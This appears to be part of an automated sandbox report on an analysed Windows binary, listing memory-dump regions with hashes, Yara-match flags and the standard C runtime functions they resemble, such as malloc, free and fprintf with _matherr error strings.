                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                  • String ID:
                                  • API String ID: 4151157258-0
                                  • Opcode ID: 6fcaa51569f33512e2090195287e243e2f4399f94586e7a5485698e02a016b7c
                                  • Instruction ID: 3a801d6313a3891bb68b12db2ad2893af1d4adb1961711ab6569276376476b50
                                  • Opcode Fuzzy Hash: 6fcaa51569f33512e2090195287e243e2f4399f94586e7a5485698e02a016b7c
                                  • Instruction Fuzzy Hash: 32213A22D186A84EE7A4F72840EC33977C4E7453ADF450A5DE0A6C75C1DB6D88C1C291
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: Byte$CharLeadMultiWide
                                  • String ID:
                                  • API String ID: 2561704868-0
                                  • Opcode ID: 07110f3e4585fca3029552749c4b5a6eefc6802b1a1722dc30d4a2d58fd3f1a6
                                  • Instruction ID: b93cde87a6c40efe5efc22a88bcd30119029abd6d1ad7554e1c4135a37bffe56
                                  • Opcode Fuzzy Hash: 07110f3e4585fca3029552749c4b5a6eefc6802b1a1722dc30d4a2d58fd3f1a6
                                  • Instruction Fuzzy Hash: 7E3106B260D28186E3709F24F54476BBAA0FBD0784F858138EA88477E4EF3DD454CB50
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: malloc$FreeHeap_errno_getptdfree
                                  • String ID:
                                  • API String ID: 3311824342-0
                                  • Opcode ID: d0a27817efde19c6f8d87261e0c14dccd853f4b6914fa58adb41ed9447b39478
                                  • Instruction ID: 18e06c03d81c4f1df9989b101ea2493b517125183e80cd470b2044bbe81e8ef2
                                  • Opcode Fuzzy Hash: d0a27817efde19c6f8d87261e0c14dccd853f4b6914fa58adb41ed9447b39478
                                  • Instruction Fuzzy Hash: 8DC1C330E24A048FF769DF28984977533E4F74A314F60412AD467C31A2DB7D98878796
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                  • String ID: B
                                  • API String ID: 1812809483-1255198513
                                  • Opcode ID: 6354dd7fc53b9600f59efb332da70efbe254211307fc8429e275f3790f02590a
                                  • Instruction ID: eacb9c4b58b8c15e942cef2f50f394057e56ad8169246f34ebdeb09f3d49f985
                                  • Opcode Fuzzy Hash: 6354dd7fc53b9600f59efb332da70efbe254211307fc8429e275f3790f02590a
                                  • Instruction Fuzzy Hash: 6711B230618A088FD754EF5894897A5B7D5FB98328F1047AEA02AC32A1CB78C880C792
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: fprintf
                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                  • API String ID: 383729395-3474627141
                                  • Opcode ID: 18b5a7e72f4aa1f32891237afb46640efb7dc138980b134b57c0f1cc52138558
                                  • Instruction ID: bcd578a47acadb669053fdcb6f8e2fb010e8fab75a7cf7259b68f70fda9e2d15
                                  • Opcode Fuzzy Hash: 18b5a7e72f4aa1f32891237afb46640efb7dc138980b134b57c0f1cc52138558
                                  • Instruction Fuzzy Hash: 1D018262D0DF8482D6019F1CD8005BBB331FBAE749F569326EE8C26165EF28E592C710
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: fprintf
                                  • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                  • API String ID: 383729395-2713391170
                                  • Opcode ID: 36a8b9b8bb6a0068f3851d73249c556652288eaa394a31a9df822b8f59a9715d
                                  • Instruction ID: 4b5649ccdb654c9a00df74f8c1376ccaa7e9220f0b383d3d1f691872384d05ba
                                  • Opcode Fuzzy Hash: 36a8b9b8bb6a0068f3851d73249c556652288eaa394a31a9df822b8f59a9715d
                                  • Instruction Fuzzy Hash: 77F06252C0DE8482D2029F1DA8001ABB331FF9E788F955326EE8D26165EF28E5928710
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: fprintf
                                  • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                  • API String ID: 383729395-4064033741
                                  • Opcode ID: e9767e1b7891e187fd86bbc5d73802c34d596f274d59eef1662dea47d815f603
                                  • Instruction ID: 74654362899f9e9fccb6bd3919f1525d72d06ab9fb0da36bee9f95133961e801
                                  • Opcode Fuzzy Hash: e9767e1b7891e187fd86bbc5d73802c34d596f274d59eef1662dea47d815f603
                                  • Instruction Fuzzy Hash: CDF09652C0DE8482D2029F1DA4000BBB331FF9D788F955326EF8D26165EF28E5928710
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: fprintf
                                  • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                  • API String ID: 383729395-4283191376
                                  • Opcode ID: 02d120e96a4f18504ed5b78213fe030ed88dcfe4954d98f3a15fc78ff0f8aa15
                                  • Instruction ID: 045493fce1504ef04c28d7a08070d38549538e93eb5d59ceb129518ea97df667
                                  • Opcode Fuzzy Hash: 02d120e96a4f18504ed5b78213fe030ed88dcfe4954d98f3a15fc78ff0f8aa15
                                  • Instruction Fuzzy Hash: 43F09652C0DE8482D2029F1DA4000BBB331FF9D788F955326EF8D36165EF28E5928710
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: fprintf
                                  • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                  • API String ID: 383729395-4273532761
                                  • Opcode ID: cf3cde470adbfa676136cf92705c7a73604e31a104007e65b262180e8165483a
                                  • Instruction ID: 82c4b2f337bd4702a8508025e183c12f4f744643f4b25a66efa777512e128913
                                  • Opcode Fuzzy Hash: cf3cde470adbfa676136cf92705c7a73604e31a104007e65b262180e8165483a
                                  • Instruction Fuzzy Hash: 7BF09652C0DE8482D2029F1DA4000BBB331FF9D788F955326EF8D26565EF28E5928710
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: fprintf
                                  • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                  • API String ID: 383729395-2187435201
                                  • Opcode ID: 9ae2bdb1f3dde9bb08c4549d06ee16cc509c6c2e1d9ee9e5fe925181760e0a59
                                  • Instruction ID: c79a11f86c167a84311744cd6e3556a206b9629ee4babefcbdee510e126b9cee
                                  • Opcode Fuzzy Hash: 9ae2bdb1f3dde9bb08c4549d06ee16cc509c6c2e1d9ee9e5fe925181760e0a59
                                  • Instruction Fuzzy Hash: 6EF09652C0DF8482D2029F1DA4000BBB331FF9D788FA55326EF8D26165EF28E5928710
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: fprintf
                                  • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                  • API String ID: 383729395-2468659920
                                  • Opcode ID: 895bed46dadeadfeba59de4c3ea82e4edf64d5721dd00a691e0523597a9cd40e
                                  • Instruction ID: 97c61d3316575d8a866035be50ca22bcc0df05bced5bca02c0e7e25230d13b91
                                  • Opcode Fuzzy Hash: 895bed46dadeadfeba59de4c3ea82e4edf64d5721dd00a691e0523597a9cd40e
                                  • Instruction Fuzzy Hash: A9F09652C0DF8482D2029F1DA4000ABB331FF9D788F555326EF8D2A165EF28E5928710
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: free$_errno$_callnewhmalloc
                                  • String ID:
                                  • API String ID: 2761444284-0
                                  • Opcode ID: dd038f529a1152db983726e88818db10f6b0a149fc053e6d5e168077c86b9374
                                  • Instruction ID: fb61d0ac87e5fa5a72b01af40f91fa893748768896b0f7bb1d3a878c07e398b1
                                  • Opcode Fuzzy Hash: dd038f529a1152db983726e88818db10f6b0a149fc053e6d5e168077c86b9374
                                  • Instruction Fuzzy Hash: 5061BB30A18A084BEB59EB28948D7BD73D5E7D4758F10061DE46BC31C3DF3E998287A2
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                  • String ID:
                                  • API String ID: 3442832105-0
                                  • Opcode ID: fc51f4615cf0e27a482f6b22ff4d87c06e4feeef8bc37e62b75beb2dd9a3da3a
                                  • Instruction ID: 9761cefb918c6a08650392357f7f92c5e7bd2a89f87b2a5d9d44fec8e95ef8d5
                                  • Opcode Fuzzy Hash: fc51f4615cf0e27a482f6b22ff4d87c06e4feeef8bc37e62b75beb2dd9a3da3a
                                  • Instruction Fuzzy Hash: A761A930918A488FEB44EF54D8897EAB7E5FB98309F004669E45BC3192DF3DD985CB81
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: malloc
                                  • String ID:
                                  • API String ID: 2803490479-0
                                  • Opcode ID: 0ccdd68a0240799a77ae4be0c48a7008bd312d06eef73861b9d961f3f66470dc
                                  • Instruction ID: 723fd1da55290788f4636b5b6af719a85650370f9dce3b93f270be151003bf62
                                  • Opcode Fuzzy Hash: 0ccdd68a0240799a77ae4be0c48a7008bd312d06eef73861b9d961f3f66470dc
                                  • Instruction Fuzzy Hash: 7851D930A1CA054BDB5D9F2C948D67A73D5FB89304F14066DE85BC3686EF3AEC828641